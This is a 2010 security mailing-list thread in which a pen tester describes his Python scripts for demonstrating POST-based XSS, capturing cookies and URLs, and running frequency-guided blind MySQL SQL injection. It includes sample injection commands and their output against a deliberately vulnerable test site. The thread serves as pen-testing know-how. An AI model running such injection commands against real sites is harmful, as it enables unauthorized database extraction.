Re: Misc Web Pen testing scripts

["Baggett, Mark" <mark.baggett () morris com>]

Not at all, but let me clean them up a bit first.  I have a few small errors to fix then I'll post them to the pdc blog.

-----Original Message-----
From: pauldotcom-bounces () mail pauldotcom com [mailto:pauldotcom-bounces () mail pauldotcom com] On Behalf Of Robin 
Wood
Sent: Sunday, September 05, 2010 11:49 AM
To: PaulDotCom Security Weekly Mailing List
Subject: Re: [Pauldotcom] Misc Web Pen testing scripts

Would you mind if I added these to the PenTester Scripting website http://www.pentesterscripting.com/ ?

Robin

On 3 September 2010 17:31, Baggett, Mark <mark.baggett () morris com> wrote:
> I'm trying to learn python.  Userpass.py was my first python script.
> (http://pauldotcom.com/2010/08/draft---creating-per-user-cust.html)
> Eventually, I am going to write something that doesn't completely suck.
> There scripts are still a work in progress.  Send me comments and 
> suggestion off list.  I hope they are useful. If you find errors 
> before I post these to the blog I'd appreciate a heads up.
>
> Thanks
> Mark Baggett
>
> 1)get2post.py
> Use to demonstrate POST based XSS attacks to a customer.  Put get2post 
> on a single host then you can create URL's with the POST values for 
> the customer.  Same functionality as 
> http://www.whiteacid.org/misc/xss_post_forwarder.php but on your own 
> server so you are not disclosing a customers XSS issues to a third 
> party.
>
> 2)p0wnpr0xy.py
> Grabs URL's & cookies as you browse and launches the tool of choice.
> Here is a demo video http://www.vimeo.com/14667308
>
> 3)sqlinjector.py
> This is a MySQL blind SQL injector that uses a much different SQL 
> injection technique.  Instead of repeatedly cutting the alphabet in 
> half or brute forcing the letters it uses a per letter frequency table 
> to predict the next letter.  For example, if you have a Q there is a 
> HIGH probability that the next letter is a U. The technique is 
> discussed and outlined here:
> http://www.exploit-db.com/papers/13696/  47 fewer guesses than 
> bsqlbf.pl!  79 vs 126
>
> I implemented this technique in python.   You give the script a 
> vulnerable URL, and you put your SQL query in the URL with carets as 
> markers at the point on injection.  This syntax enables flexible url 
> endings.
>
> mark.baggett$ $ python sqlinjector.py
> "http://testphp.vulnweb.com/listproducts.php?cat=1^database()^#"
> a
> ac
> acu
> acua
> acuar
> acuart
> end of word found
> Found target acuart in 79 guesses.
> mtcexcp007:misc mark.baggett$
>
> mark.baggett$ perl bsqlbf.pl -blind cat -sql "database()" -url
> http://testphp.vulnweb.com/listproducts.php?cat=1
>
>  // Blind SQL injection brute force.
>  // aramosf () 514 es / http://www.514.es
>
> <truncated>
>  trying: acuart#### results:
>  database() = acuart
>  total hits: 126
>
>
>
> _______________________________________________
> Pauldotcom mailing list
> Pauldotcom () mail pauldotcom com
> http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom
> Main Web Site: http://pauldotcom.com
_______________________________________________
Pauldotcom mailing list
Pauldotcom () mail pauldotcom com
http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom
Main Web Site: http://pauldotcom.com
_______________________________________________
Pauldotcom mailing list
Pauldotcom () mail pauldotcom com
http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom
Main Web Site: http://pauldotcom.com